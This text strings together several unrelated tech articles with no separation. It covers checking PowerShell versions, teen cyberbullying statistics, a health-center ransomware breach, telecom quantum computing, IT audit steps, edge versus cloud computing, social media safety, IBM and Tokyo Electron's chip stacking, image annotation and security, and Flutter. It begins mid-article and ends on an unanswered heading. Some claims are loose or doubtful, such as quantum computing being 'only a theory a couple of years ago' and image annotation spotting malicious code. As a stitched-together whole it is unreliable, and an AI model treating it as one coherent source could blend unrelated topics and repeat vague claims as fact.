If you are running PowerShell Core on Linux, you can check the PowerShell version by opening the Terminal (if necessary) and entering pwsh --version. (Note that this command is meant to be run from the Linux command line, not from within PowerShell.) You can see what this looks like in Figure 2.

Figure 2. Linux lets you check the PowerShell version using the pwsh --version command.

You can launch PowerShell (assuming that it is installed) by using the pwsh command. Once PowerShell is running, you can check its version by using the same commands used in Windows PowerShell. See Figure 3 for an example.

Figure 3. Once running, you can check the PowerShell version in Linux the same way that you do in Windows PowerShell.

What Are the PowerShell Version Numbers?

As of publishing this article, the existing versions are Windows PowerShell 1.0, 2.0, 3.0, 4.0, 5.0, and 5.1, followed by the cross-platform PowerShell (formerly PowerShell Core) 6.x and 7.x releases.

Upgrade to a New Version of PowerShell

So, what happens if you check the PowerShell version and discover that you need a newer version? One option is to run Windows Update. However, Windows Update will not always install the latest version of PowerShell. If you want the most recent PowerShell build, you will have to download it from Microsoft. Microsoft offers different installation options, such as Winget, MSI packages, ZIP files, and even Microsoft Store packages. As such, you can choose the option that works best for your own situation.

Based on my experience, the easiest option is to download an MSI package. Just download and then double-click the MSI file. Windows will launch a GUI-based installer like the one shown in Figure 4.

Figure 4. The PowerShell MSI files include a GUI-based installer.
Checking your PowerShell version isn't something you will do daily, but it is important to know which version you have. As noted above, some PowerShell cmdlets will run only on specific PowerShell versions. Hence, if you are having trouble getting a command to work, check to make sure that you are running the required PowerShell version.
A report titled Teens, Kindness and Cruelty on Social Networks is shining some light on the dark issue of online bullying. An alarming 88% of teens today have seen cruelty on social networks like Facebook and Twitter. Even worse, 90% of teens opt to ignore cruelty when they see it. Social networking is supposed to bring people together, not drive them apart.

I didn't even have internet when I was in school! I grew up in a time when you had to use a library for research—something many kids today don't even know how to do. When it came to bullying, it happened in the "good old-fashioned way": in the flesh, in all its horrifying glory, complete with emotional scars years later to prove it. That was enough for me.

Teens today have the upper hand with technology. Social media is a big part of their lives. For some, it is their lives. To "live" means to be online—and they are, 24/7. They have smartphones that do everything, they use the cloud as a scapegoat, and they can even learn from home. Mobile and social tech trends are already big-name news, and both are only going to get bigger in the coming year.

Despite how integral social networking is in most teens' lives, in-person bullying is still the favorite approach of mean kids today. However, the study shows only 19% of teens have been the victim of bullying of any sort. Only 15% said they've been targeted solely online. Is that good news?

All these stats are great, but what do they really mean? Only 19% of teens being victimized might not seem like a number to be alarmed over, but it is. Bullying is a serious issue, and it can really damage someone. Social media can amplify this damage. This report says nothing about how bad the cruelty was. Name-calling? Taunting? Some bad comments on photos or Facebook statuses? How about ongoing public humiliation for the whole world to see online?

Kids can be cruel, and the illusion of anonymity the web gives people seems to fan the fires. With teens committing suicide because of bullying, even 1% is enough to be concerned over. No one needs to die. Social networks shouldn't condone cruelty; they should prevent it (e.g., the It Gets Better project).

In the end, despite the fact that 9 out of 10 teens see antisocial behavior online, 78% of them report social media leads to positive outcomes. It doesn't sound so positive to me. What do you think?
A ransomware attack beginning in September has left Betty Jean Kerr People's Health Centers scrambling. The health center declined to pay the ransom and, as a result, remains unable to access its computer networks. It has, however, hired a forensic information technology firm to try to recover the patient data.

Protected health information (PHI) that may have been exposed in the ransomware attack includes patient names, addresses, dates of birth, Social Security numbers, pharmacy data, clinical data, insurance information, and dental X-rays. The health center has notified the 152,000 affected patients and has recommended that patients monitor their account statements. It will also be offering free credit monitoring to affected patients.

How to Protect Your Organization Against a Ransomware Attack

Ransomware attacks occur when a hacker gains unauthorized access to an organization's network, often encrypting or stealing files. Files remain inaccessible to the target until a sum of money is paid for their return. To protect your organization from a ransomware attack, the Department of Health and Human Services (HHS) recommends the following ten cybersecurity practices:

- Email protection systems
- Endpoint protection systems
- Access management
- Data protection and loss prevention
- Asset management
- Network management
- Vulnerability management
- Incident response
- Medical device security
- Cybersecurity policies

Healthcare organizations are increasingly targeted by hackers, as the wealth of information they hold on their patients has a high value on the dark web. Information obtained from a healthcare breach can be used to commit identity theft or fraud, or to blackmail patients. Implementing the recommended cybersecurity practices can save your organization from a ransomware attack, preserving your reputation and your wallet.
Telecom Quantum Computing: A Dream or a Fantasy?

A quantum computer is a special kind of computer that uses quantum mechanics to perform some computations more quickly than a conventional computer. Once the technology matures, it is set to revolutionize every industry known to humankind. Alongside the pharmaceutical and cybersecurity sectors, experts postulate that this innovation will change the telecoms industry as we know it, primarily through quantum-resistant cryptography. As joyful and hopeful as these promises sound, telecom quantum computing presents many obstacles that may render it a fantasy rather than a dream.

Telecom Quantum Computing: Potentially Redefining the Sector

Quantum computing could redefine the entirety of the telecommunications sector. Remember that a quantum computer is akin to a supercomputer on steroids in terms of performance and capabilities. And to think that quantum computing was only a theory a couple of years ago!

Embedding Itself into the Sector

The technology has a couple of different use cases in telecommunications. In February 2020, TIM, formerly known as Telecom Italia Mobile, claimed it had used quantum computing for 5G network planning, a first in Europe. The mobile operator used a quadratic unconstrained binary optimization (QUBO) model to plan 4.5G and 5G network parameters on D-Wave's commercially available 2000Q quantum computer. Because QUBO solvers can identify patterns in data sequences, the approach is also helpful for machine learning. According to TIM, the computer completed the task ten times faster than traditional methods, and using it to plan cell IDs led to a more stable VoLTE (Voice over Long-Term Evolution) experience for customers on the move.

Development of RAN

Quantum computing algorithms made up of quantum gates will be necessary to carry out the RAN's management-plane and user-data-plane functionality. As of yet, only a few classical algorithms have a quantum counterpart, and not all of them have been formulated for quantum hardware. Physical-layer processing functions have strict latency requirements, so they will probably run on local hardware instead of cloud-based hardware. Current quantum chipsets have a capacity of roughly 50-100 qubits. To speed up virtualized RAN functions, a mobile operator could place compact quantum chips close to the customer's premises or even inside the RAN's digital unit.

Optimization of the Network

Quantum computers require specialized algorithms in order to carry out quick and precise operations. With the help of such algorithms, global convergence is achievable while increasing computing power and operating speed. These could lead to a wide range of network optimization applications, including solving challenging business issues and making financial savings.

Not as Achievable as It Sounds

According to experts in this field, ranging from physicists to computing geniuses, the technology is at least three years away from being scalable and applicable enough to run the show in all industries, especially telecoms. The development and subsequent application of telecom quantum computing have some obstacles to clear first.

Handle with Care

The classic binary bit's quantum counterpart is the qubit, physically realized with a two-state quantum device. These basic quantum units of information are what allow the technology to carry out its complex calculations so efficiently.
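As a loose illustration of what a two-state quantum device means, the math of a single qubit can be mimicked classically in a few lines. This sketch simulates measuring an equal superposition and is nothing like real quantum hardware:

import math
import random

# A qubit state is a pair of amplitudes (alpha, beta) with
# |alpha|^2 + |beta|^2 = 1. Start in an equal superposition,
# like the output of a Hadamard gate applied to |0>.
alpha = beta = 1 / math.sqrt(2)

def measure(a: float, b: float) -> int:
    """Collapse the state: return 0 with probability |a|^2, else 1."""
    return 0 if random.random() < a * a else 1

samples = [measure(alpha, beta) for _ in range(10_000)]
print(sum(samples) / len(samples))  # ~0.5: half the runs collapse to |1>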
The only downside to qubits is that they are very fragile. In fact, they are extremely susceptible to heat and require extremely low temperatures to function. As a result, building, verifying, and designing quantum systems is a challenging feat. This fragile nature renders quantum computing more error-prone and less reliable than traditional computing.

Errors are an unavoidable phenomenon in computation, and this is especially true in quantum computation, where we must exercise precise control over the behavior of ultra-sensitive quantum systems. Enter quantum error correction (QEC)! This branch of quantum computing concerns protecting quantum information from errors resulting from decoherence and other quantum noise. Experts postulate that QEC is essential to achieving fault-tolerant quantum computing, which must reduce the impact of:

- Noise on stored quantum information
- Faulty quantum gates
- Faulty quantum state preparation
- Faulty measurements

In my line of work, I've heard "telecom is the foundation of the future" more times than I care to admit. And as time goes on, as I write more articles and delve deeper into this industry, I find myself agreeing. The telecom sector is, indeed, the future. This sector is capable of powering many innovations, including the metaverse. But its true power and potential could be exponentially greater through quantum computing. Telecom quantum computing has the potential to become the future, but not without some setbacks first. How experts deal with those setbacks will determine whether the end goal is a dream coming true in the next five years or a fantasy held by brilliant yet wishful minds.
IT audits are essential for maintaining the security and integrity of corporate data, focusing on a company's technological framework, procedures, and policies. Through this process, auditors scrutinize the IT systems to verify that they meet business needs effectively while ensuring data protection. These audits involve a series of systematic steps aimed at assessing whether IT infrastructure not only aligns with the organization's goals but also adheres to security standards and best practices.

An IT audit begins with planning, where auditors define the scope and objectives. They gather information about the existing IT environment and establish benchmarks against regulatory requirements or industry standards. The next phase is fieldwork, where auditors test the controls in place, verify compliance with policies, and evaluate system performance and security measures. The findings are then compiled, and any weaknesses or gaps in the system are highlighted. Based on these insights, a report is generated that outlines recommendations for improving the infrastructure and securing data. The final step is a follow-up review to ensure that suggested improvements have been implemented.

The importance of IT audits lies in their role in preventing data breaches, ensuring compliance with laws and regulations, and enhancing overall operational efficiency. Regular IT audits are thus crucial for any organization that relies on technology for its day-to-day operations.

1. Obtain Approval

Before embarking on an IT audit, the first essential step is to gain approval from senior management. This endorsement is not just a formality; it shows that the audit has the necessary backing and resources. The approval sets a precedent for the audit's importance and ensures that the findings will be taken seriously, leading to the implementation of recommended changes.

Once approval is received, the scope of the audit must be clearly defined. This includes articulating the main objectives, which could range from assessing compliance with regulations to improving system security. With a clear mandate, auditors can focus their assessment efficiently and effectively.

2. Develop a Strategy

Developing a well-outlined strategy is foundational for a successful IT audit. This plan outlines which components of the IT infrastructure will be examined, which types of controls will be assessed, and how deeply the audit will delve into the company's IT environment. The strategy should also lay out clear objectives, including what the audit aims to achieve, and set realistic timeframes for completion. Whether the concern is cybersecurity, data integrity, or operational efficiency, the audit plan should reflect the organization's unique needs and resources.

During this planning stage, it's important to understand that the strategy essentially guides the course of the audit. It ensures that all necessary aspects are covered without straying from the main objectives, creating a reliable pathway for the auditors to follow.

3. Begin Preparation

The preparation stage involves deciding who will conduct the audit, which could be an in-house team, the company's internal audit department, or an external entity. Each option comes with its advantages and implications. First-party audits, by an in-house team, benefit from the auditors' intimate knowledge of the company. Second-party audits involve the company's internal audit department and ensure adherence to internal standards.
Third-party audits offer an external perspective and are often seen as the most impartial. Choosing the right audit team is paramount because their expertise will directly influence the audit's quality. The team must have a mix of technical knowledge, analytical skills, and a firm understanding of the standards that the company must adhere to.

4. Arrange an Audit Space

A proper workspace for the audit team is crucial for a productive audit. Typically, a reserved conference room functions as the command center, where auditors analyze documents, hold interviews, and discuss their observations. A dedicated area helps maintain uninterrupted work and the confidentiality of sensitive data. The room not only offers a physical zone for auditors but also reflects the mental zone of deep focus and meticulous examination they enter during an audit. By providing a well-equipped work environment, an organization shows its commitment to the auditing process, creating a professional atmosphere conducive to high-quality auditing work.

To ensure the space is effective, it should be quiet, have sufficient lighting, be equipped with necessary technology, and have enough room for collaboration among auditors as well as for private conversations. The audit space is more than just a room; it's a sign of the organization's respect for the importance of the audit and the auditors' need for a space that supports their critical work.

5. Initiate the Audit Process

Launching the audit involves briefing the IT department on the process, objectives, and how the audit will unfold. Transparency about the expectations and the types of evidence required is crucial at this stage to mitigate any apprehension and to encourage cooperation from the IT staff. The initial interaction establishes the tone of the audit, emphasizing collaboration over inquisition. This phase sets up the groundwork for a smooth review process, with less friction and resistance from the IT department, thereby improving the chances of a comprehensive and truthful assessment of the IT controls.

6. Compile Documentation

Conducting a thorough audit requires obtaining and evaluating a range of documentation, from official policy documents to notes taken during interviews. Auditors gather these records to construct a comprehensive view of the IT department's performance, its policies, and its conformity with the established controls. The methodical organization of this documentation is crucial for maintaining a clear path of evidence and underpinning the final report with solid proof. Each document contributes to a clearer understanding of the IT landscape and points towards potential areas of improvement.

By piecing together these documents, auditors can meticulously assess the IT department's operations. They can pinpoint where the department aligns with best practices and identify any gaps in compliance or areas where security may be at risk. This process is pivotal in recommending changes that could fortify IT processes and enhance data management practices. Ultimately, the documentation collected serves as both a reflection of the IT department's current state and a roadmap for its enhancement. It is a testament to the thoroughness of the audit process and the detailed scrutiny under which the IT department is evaluated.

7. Finalize and Present the Audit Report

The final report of an IT audit is a crucial document that presents a comprehensive assessment of the IT department's adherence to internal controls and pinpoints areas for improvement.
This report is not merely a summary of the audit process but a significant instrument that enables the organization to fortify its IT framework, mitigate potential risks, and uphold stronger security and regulatory compliance standards. Crafting a report that is both detailed and accessible is paramount—the aim is for it to be digestible to senior management and relevant parties. Through its guidance, these leaders can initiate the appropriate corrective measures. Upon delivery, the report catalyzes the transition from evaluative review to proactive implementation. Its pivotal role underscores the value of the IT audit as not just a retrospective critique but as a lever for transformation, driving the organization’s IT infrastructure towards higher levels of operational excellence.
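Much of the fieldwork described above, testing controls against a benchmark, lends itself to simple automation. A minimal sketch of the idea follows; the control names and thresholds are invented for the example and do not come from any real standard:

# Illustrative benchmark: control name -> (comparison direction, required value).
BENCHMARK = {
    "password_min_length": ("min", 12),
    "password_max_age_days": ("max", 90),
    "failed_login_lockout_attempts": ("max", 5),
}

# Settings collected from one system during fieldwork.
collected = {
    "password_min_length": 8,
    "password_max_age_days": 90,
    "failed_login_lockout_attempts": 10,
}

def evaluate(settings: dict, benchmark: dict) -> list[str]:
    """Return one finding for every control that misses its benchmark."""
    findings = []
    for control, (direction, required) in benchmark.items():
        actual = settings.get(control)
        if actual is None:
            findings.append(f"{control}: not configured (required: {required})")
        elif direction == "min" and actual < required:
            findings.append(f"{control}: {actual} is below the minimum of {required}")
        elif direction == "max" and actual > required:
            findings.append(f"{control}: {actual} exceeds the limit of {required}")
    return findings

for finding in evaluate(collected, BENCHMARK):
    print("FINDING:", finding)

Checks like this do not replace auditor judgment, but they make the evidence trail reproducible and easy to attach to the final report.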
Edge computing is a decentralized computing model that brings computational resources closer to the data source or endpoint. It involves processing data locally on devices or at edge servers, reducing latency and improving response times. Edge computing is often used for real-time data processing and applications that require low latency, such as IoT devices and autonomous vehicles.

Cloud computing, on the other hand, is a centralized model that relies on remote data centers to process and store data. It offers scalability, accessibility, and cost-efficiency but can introduce latency due to data transfer to and from the cloud. Cloud computing is widely used for web services, data storage, and enterprise applications.

Mark Swinson, enterprise IT automation specialist at Red Hat, tells EdgeIR that edge computing is an ecosystem play, bringing different parts together to create solutions with flexibility.

"With the development of AI and machine learning, it's increasingly likely that an application's lifecycle will circulate through both ends of the spectrum, from the data center to the edge - therefore new solutions must equally support both," he adds.

"Developments in cloud computing, such as the way Kubernetes implements a 'desired state' system where outcomes are specified, make managing complex topologies at scale more feasible. Applying these same approaches brings benefits to edge solutions too. As computing resources at the edge continue to grow in capability and capacity, we're set to see more sophisticated workloads run close to where data is produced. This necessitates not only common standards and approaches but an intent to collaborate and, to some extent, a willingness to experiment.

"There's no getting away from the dispersed nature of edge computing, or the need for remote installation. Once a device has been plugged in and powered on, automating the setup reduces the scope for errors and mitigates the need for highly skilled technicians. In summary, edge computing will become less distinct from data center-based computing and rather a continuum with consistent architectures, tools, processes and security. This will lead to greater flexibility, agility and confidence, opening up more edge computing opportunities."

Location of processing and latency

With edge computing, processing occurs at or near the data source or endpoint, making it ideal for applications that demand immediate response times. Examples include industrial automation, autonomous vehicles, and augmented reality. With cloud computing, by comparison, processing occurs in remote data centers, which can introduce latency. Cloud computing is suitable for applications where latency is less critical, such as email services, document storage, and data analysis.

Rajasekar Sukumar, SVP and head of Europe at Persistent Systems, says: "For some businesses, the remote infrastructure of the cloud simply can't provide the ultra-low latency needed to transfer data swiftly from point A to point B. This is where edge computing comes into play - bringing data processing physically closer to the source.

"Though it sounds like another buzzword, 'edge' is very helpful in understanding this technology, as it refers literally to geographic proximity - it happens at the 'edge' or periphery of the network. A helpful analogy is comparing the cloud to a restaurant's kitchen. Edge computing positions computation at the 'chef's table' - not in the thick of the action but much closer than a typical dining table.
"This proximity enables real-time insights from vast datasets that would otherwise suffer lag moving to and from the cloud. Like having your meal prepared right in front of you rather than waiting for a waiter, edge computing eliminates unnecessary distance between data and processing. For businesses looking to become data-driven, edge computing unlocks key capabilities like instant analytics and rapid response times. It represents a paradigm shift in how computation can enhance data-intensive workflows without the cloud's inherent latency. The edge's speed and localization are leading to transformative new use cases across various industries. It's a disruptive new computing model unlocking innovation through proximity."

Edge computing offers ultra-low latency since data is processed locally or near the data source. This makes it crucial for applications that require real-time decision-making, like self-driving cars or telemedicine. Cloud computing can introduce higher latency due to data transfer between the edge device and the remote data center. It may not be suitable for applications that demand near-instantaneous responses.

Scalability, security and cost

With edge computing, scalability can be limited by the physical infrastructure of edge devices. Adding more edge servers may require additional hardware and resources. Cloud computing, on the other hand, offers high scalability due to the vast resources available in data centers. Users can easily scale up or down according to their requirements.

Regarding security, with edge computing, data remains closer to the source, potentially reducing the risk of data breaches during transit. However, edge devices may be more vulnerable to physical tampering. With cloud computing, data is stored remotely, which can be advantageous for data security, and cloud providers often invest heavily in cybersecurity measures. However, data transmission to the cloud can pose security risks.

When comparing cost, the initial setup costs for edge infrastructure can be high, and maintenance and upgrades may also incur ongoing expenses.

Nevzat Ertan, chief architect and global manager for digital machining architecture at Sandvik Coromant, says: "Edge computing and edge analytics describe data capture, processing and analysis that take place on a device — on the edge of the process — in real time. Unlike traditional methods, which typically collate data from several machines at a centralized store, edge computing is a distributed model that brings a machine's — or a group of machines' — computation and data storage closer to the sources of data. This can improve response times and save bandwidth.

"Conducting analytics at an individual device can provide significant cost and resource savings compared to data processing using a purely cloud-based method. For clarity, this cloud-based method refers to streaming data from multiple devices to one centralized store and conducting data analysis there.

"Using the centralized method, huge volumes of data must be collected and transferred to one place before they can be analyzed. This method can also create a massive glut of operational data — and weeding out insightful knowledge from the monotonous can be a painstaking task."
With edge computing, operators can instead set parameters to decide which data is worth storing — either in the cloud or in an on-site server — and which isn’t.”

Ertan adds that edge computing is not an alternative to cloud-based methods, and highlights that these technologies are not competing against each other. “In fact, each is making the other’s job easier. The benefit of this combined model is that it allows enterprises to have the best of both worlds: reducing latency by making decisions based on edge analytics for some devices, while also collating the data in a centralized source,” he continues.

Ideal for real-time applications like autonomous vehicles, smart cities, and remote monitoring in industries, edge computing can also enhance privacy by processing data locally. While cloud computing is typically suited for web hosting, big data analysis, content delivery, and enterprise applications that do not require real-time processing, both edge computing and cloud computing can work hand in hand.

“Edge computing and cloud computing are two distinct computing paradigms that serve different purposes but can also complement each other in certain scenarios. Both edge computing and cloud computing can offload data processing and storage from local devices, reducing the burden on end-user devices and enabling more efficient resource utilization,” says Sundaram Lakshmanan, CTO at Lookout.

“Edge computing and cloud computing can work together in a complementary manner. Edge computing can handle real-time processing and immediate decision-making, while cloud computing can handle more resource-intensive tasks, long-term storage, and complex analytics.

“Edge computing focuses on processing data locally and reducing latency, while cloud computing offers scalability, extensive storage, and centralized processing. Both paradigms have their unique strengths and can be used together to create a hybrid computing environment that optimizes performance and efficiency based on specific use cases and requirements.”

In practice, a combination of both edge and cloud computing, known as hybrid computing, is often used to leverage the advantages of each model, as the sketch below illustrates. Edge computing and cloud computing are distinct approaches to handling the growing demands of modern computing, and as technology continues to evolve, the boundary between edge and cloud computing could potentially blur, creating more opportunities for innovation and efficiency.
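To make the division of labor concrete, here is a minimal sketch of the hybrid pattern described above: a device loop that acts locally on urgent readings and forwards only aggregates to a central store. It is written in Python for illustration; the sensor, threshold, and endpoint names are invented, not any vendor's API.

```python
import random
import statistics

CLOUD_URL = "https://example.com/ingest"   # hypothetical central endpoint
ALERT_THRESHOLD_C = 80.0                   # operator-set edge parameter

def read_sensor() -> float:
    """Stand-in for a real sensor driver; returns a simulated reading."""
    return random.gauss(70.0, 8.0)

def act_locally(reading: float) -> None:
    """Immediate, low-latency response taken at the edge itself."""
    print(f"ALERT: {reading:.1f} C exceeds threshold, acting locally")

def send_to_cloud(summary: dict) -> None:
    """Stand-in for an HTTP POST to the centralized data store."""
    print(f"uploading to {CLOUD_URL}: {summary}")

def edge_loop(ticks: int = 180, window_size: int = 60) -> None:
    window = []
    for _ in range(ticks):
        reading = read_sensor()
        if reading > ALERT_THRESHOLD_C:
            act_locally(reading)           # no cloud round trip needed
        window.append(reading)
        if len(window) == window_size:
            # Only the aggregate travels to the cloud, saving bandwidth.
            send_to_cloud({"mean_c": round(statistics.mean(window), 2),
                           "max_c": round(max(window), 2)})
            window.clear()

if __name__ == "__main__":
    edge_loop()
```

The operator-set threshold mirrors Ertan's point about choosing which data is worth storing: raw samples stay at the edge, while the centralized store receives only what is useful for long-term analytics.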
Safe Social Media: Protecting Your Online Persona

In today’s digital age, social media has become an integral part of our lives, serving as a platform for communication, self-expression, and connection. However, as we share our thoughts, photos, and experiences online, we also expose ourselves to potential risks. Protecting your online persona is crucial in safeguarding your privacy, reputation, and personal information.

Understanding the Risks

The first step to protecting your online persona is understanding the risks associated with social media. These risks include:
- Privacy Invasion: Sharing personal information, such as your location, contact details, and daily activities, can make you vulnerable to stalking, identity theft, and other privacy invasions.
- Cyberbullying: Social media can be a breeding ground for cyberbullying, where users can be subjected to harassment, threats, and abuse.
- Reputation Damage: Inappropriate posts, comments, or photos can harm your reputation, affecting your personal and professional life.
- Phishing and Scams: Social media platforms are often targeted by scammers and hackers looking to steal personal information or money.

Protecting Your Privacy

To protect your privacy on social media, consider the following tips:
- Review Privacy Settings: Regularly review and adjust your privacy settings to control who can see your posts and personal information.
- Be Mindful of What You Share: Think twice before sharing personal information, such as your location, contact details, and daily activities.
- Use Strong Passwords: Use strong, unique passwords for each social media account and enable two-factor authentication when available.
- Be Wary of Phishing Scams: Be cautious of suspicious messages or links, as they may be phishing attempts to steal your personal information.

Maintaining a Positive Reputation

Your online persona can significantly impact your personal and professional life. To maintain a positive reputation, consider the following tips:
- Think Before You Post: Consider the potential consequences of your posts, comments, and photos before sharing them online.
- Avoid Controversial Topics: Avoid engaging in controversial or divisive topics that may harm your reputation.
- Be Respectful: Treat others with respect and kindness, and avoid engaging in online arguments or harassment.
- Monitor Your Online Presence: Regularly search for your name online to monitor your online presence and address any harmful content.

Dealing with Cyberbullying

Cyberbullying can have severe emotional and psychological impacts. To protect yourself from cyberbullying, consider the following tips:
- Block and Report: Block and report users who engage in cyberbullying or harassment.
- Seek Support: Talk to friends, family, or a counselor if you are experiencing cyberbullying.
- Document the Bullying: Keep records of any cyberbullying incidents, including screenshots and messages, as they may be needed for reporting or legal purposes.
- Know Your Rights: Familiarize yourself with the laws and policies related to cyberbullying in your country or region.

Protecting your online persona is crucial in today’s digital age. By understanding the risks, safeguarding your privacy, maintaining a positive reputation, and dealing with cyberbullying, you can enjoy the benefits of social media while minimizing potential risks. Remember that your online actions can have real-world consequences, so always be mindful of what you share and how you interact with others online.
The process removes glass bonding layers – and lowers defect rates.

As semiconductors continued to get smaller, chipmakers began to strain the limits of Moore’s Law, which postulates that the number of transistors on a microchip will double every two years to yield much faster computational power in smaller chips. Now, IBM and Tokyo Electron (TEL) said they found a new method to save Moore’s Law and simplify the supply chain for chipmaking. The two developed a new method for 3D chip stacking that can produce 300 millimeter silicon chip wafers, an apparent world first.

IBM said chip stacking can potentially expand the number of transistors in a given volume – rather than an area, as Moore’s Law calls for. IBM and TEL said they created the 300 millimeter module using an “infrared laser to enable a debonding process that’s transparent to silicon — meaning standard silicon wafers can be used” without needing a temporary glass layer for processing.

“As the global chip shortage continues, we’ll likely need novel ways to increase chip production capacity over the coming years,” IBM said in a blog. “We hope our work will help cut down on the number of products needed in the semiconductor supply chain, while also helping drive processing power improvements for years to come.”

The project is a culmination of four years of work. The pair plan further tests, which will examine ways to implement the process into a full semiconductor manufacturing flow. To date, chip stacking is only seen in high-end operations such as the production of high-bandwidth memory. However, IBM and TEL believe it has the potential to expand the number of transistors in a specific volume.

Chip-stacking architectures require vertical connections between layers of silicon called through-silicon vias (TSVs). These are small connections that allow a current to flow from one silicon layer to another, essentially letting each layer “talk” to the others. The process involves thinning a silicon wafer to reveal the fabrication of TSVs required for vertical stacking. To transport these thin, fragile silicon wafers, manufacturers introduce glass to the process to create a bonding layer so the wafers can be transported without damage. Once processed, the glass is removed via ultraviolet lasers.

IBM and TEL’s novel method removes the need for glass – and reportedly leads to fewer defects during production, which in turn would ease the growing strain placed on chipmakers. The global chip shortage has seen production decrease due to factors such as the pandemic and ever-increasing demand. However, signs are emerging that the chip shortage may be easing, according to Omdia analyst Alexander Harrowell.
In this digital age, security has become paramount, especially when protecting our data. Image annotation is used to classify objects within images, while cybersecurity is used to protect this information from malicious actors. In order for businesses and organizations to properly secure their data, it’s important to understand how these two disciplines intersect.

The goal of image annotation is to accurately identify objects within an image using an image annotation tool so that they can be classified and labeled correctly. This information can then be used for a variety of purposes, such as computer vision applications or machine learning algorithms. Cybersecurity, on the other hand, focuses on protecting this data from unauthorized access by malicious actors.

Combining image annotation with cybersecurity helps businesses ensure that only authorized personnel have access to sensitive information within their images. Furthermore, by utilizing automated tools such as artificial intelligence (AI) for object detection and recognition, companies can quickly detect any suspicious activity or anomalous behavior within their systems.

Automated Image Annotation Techniques For Improved Security

An image annotation tool helps machines understand and interpret what is present in an image. This technology is particularly useful for security, as it quickly identifies potential threats or anomalies. Automated image annotation techniques can be used to detect intruders in a network, identify suspicious behavior in video surveillance footage, or even monitor traffic patterns on roads and highways.

Furthermore, this type of annotation can accurately track changes in an environment over time. For example, if a suspicious object appears at a certain location multiple times, automated image annotation could help determine whether this is part of normal activity or could potentially pose a threat. These tools enable the security team to quickly identify and respond to potential risks before they become serious issues.

What Are the Benefits of Using Automated Methods for Image Annotation and Security?

Automated methods for image annotation and security are beneficial in a number of ways. First, they can save time and money by eliminating the need to annotate images manually. Automated methods can also be more accurate than manual annotation, as they can detect objects in an image with greater consistency and precision. In addition, automated methods can be used to detect potential security threats in images, such as malicious code or malware. This helps ensure that images are safe before being shared or published online. Finally, automated methods can help reduce the risk of human error when annotating images, which could lead to incorrect labels or inaccurate results.

What Measures Should Organizations Take to Ensure Their Images Are Annotated Securely?

Organizations should take several measures to ensure their images are annotated securely. First, they should use a secure cloud-based platform for image annotation. This will help protect the data from unauthorized access and keep it safe from malicious actors. In addition, organizations should implement encryption measures on all data stored on the platform and use robust authentication protocols to verify user identities. They should also implement strict access control policies that limit who can view or modify the data.
Finally, organizations should regularly audit their systems to ensure that all security measures are being followed and any potential vulnerabilities are addressed promptly. Following these steps helps ensure that organizations have their images annotated securely and protected from malicious actors.

To summarize, image annotation and cybersecurity need to work together to create a secure and efficient system for data security. By understanding the intersection between these two fields, organizations can ensure that their data remains safe while benefiting from the advantages of image annotation.
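As one concrete illustration of the encryption measures suggested above, the following Python sketch encrypts an annotation record before it is stored. It assumes the third-party cryptography package is installed; the label schema and file names are hypothetical, not any platform's format.

```python
import json
from cryptography.fernet import Fernet

# One bounding-box annotation for an object detected in an image.
annotation = {
    "image": "cam01_frame_0042.jpg",
    "objects": [
        {"label": "person", "bbox": [112, 40, 68, 180], "confidence": 0.91},
    ],
    "annotator": "auto-detector-v2",
}

key = Fernet.generate_key()          # in practice, fetch from a key vault
cipher = Fernet(key)

# Encrypt the annotation before it leaves the annotation platform, so only
# holders of the key can read or modify it.
token = cipher.encrypt(json.dumps(annotation).encode("utf-8"))
with open("cam01_frame_0042.ann.enc", "wb") as fh:
    fh.write(token)

# Authorized personnel decrypt with the same key.
restored = json.loads(cipher.decrypt(token).decode("utf-8"))
assert restored == annotation
```

In a real deployment the key would be issued per role through the access-control policy described above, so that the same stored artifact is readable only by authorized personnel.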
Jindrich Pikora, from Prague and London based web and app developers www.applifting.cz, introduces us to Flutter, a new software tool that is empowering and speeding up app development.

According to Statista there are now over 6 billion smartphones being used across the globe, so it’s no surprise that the number of apps available to users is increasing all the time. New apps are constantly being developed, some getting millions of downloads and others just a handful.

Flutter – Build apps for any screen

The developers behind these apps have many different tools at their disposal. One of them is Flutter, which has become increasingly popular in the last couple of years, so this is a good time to look at this app development platform.

What is Flutter?

Flutter is a framework developed by Google that allows you to create mobile apps for iOS, Android, and other platforms using a single source code. It is a cross-platform technology with which you can develop several apps at the same time. Compared to going native, it comes with several perks, such as speeding up the overall process of development; there are, however, also a couple of disadvantages, but more on that later.

The first mentions of Flutter appeared in 2015, but it was only in December 2018 that the first stable release was out. Now we have Flutter 3.0, which compared to the previous releases is more secure, powerful, and packed with more features. Originally, it was used to develop mobile apps only, but this has now been extended to web applications and macOS, Linux, and Windows apps.

The pros and cons of Flutter

Flutter isn’t the first attempt at making a tool for creating cross-platform apps. It is predated by Xamarin, Ionic, and React Native, to name a few. Nowadays, Flutter is the most popular of those, so how does it fare in comparison to Swift and Kotlin in terms of native mobile app development for iOS and Android?

Pros:
- Cross-platform—you can develop two apps with one source code. No need for two different technologies. It isn’t twice as effective, as one might think, but it does help save a lot of time.
- Speed—the way the code is developed is another aspect that saves time. Declarative programming significantly speeds up development, much like the hot reload function, thus doing away with the need to recompile.
- Performance—which is comparable to native apps. For example, you can add snappy animations of any complexity.
- Customization—there is a vast array of easy-to-use premade components. Flutter’s intuitive approach to combining components allows you to tailor your app to any design, no matter how complex it is.
- Documentation—the technology is open source, therefore everyone is free to look at the source code. What’s more, all the parts are well documented and detailed, so you won’t run into any trouble there.
- Community—with an increase in use and popularity, Flutter comes with an ever-growing number of new libraries, improvements, and tutorials.

Cons:
- Size—the final size of apps is larger. Downloading, installing, and updating takes longer, and the apps take up more space on users’ phones. Compared to native apps, we’re talking about a 20% increase in size.
- Specific requirements—accessing certain hardware functions on mobile devices is more complicated than it is with native development. In some cases, you need to implement things twice, both in terms of the technology as well as the system Flutter is running on.
In general, the more system functions the app utilizes, the less you benefit from how quick the development is.
- Flutter is new—it’s been just a few years since its release, and it’s still a work in progress. As much as the community is growing, there simply aren’t that many tried-and-true best practices yet.

When to use Flutter

Due to the advantages mentioned above, developing cross-platform apps in Flutter is in high demand. Even larger companies use Flutter for their apps, such as Alibaba, BMW, or even Google itself. Consequently, some developers thought that native development is no longer needed and everything should be developed in Flutter. That is not the case. We must not forget its shortcomings, which in some cases make developing native apps for each platform separately the better choice.

As mentioned before, you can use Flutter to develop desktop apps as well, though it isn’t that common. Web development is suitable only for a couple of kinds of web apps—like those dealing with administration, games, and graphically demanding systems. On the other hand, it’s not suitable for your run-of-the-mill websites. There are certain limitations that it comes with, like some packages not being supported or the lack of browser optimization (SEO).

Where does Flutter shine?

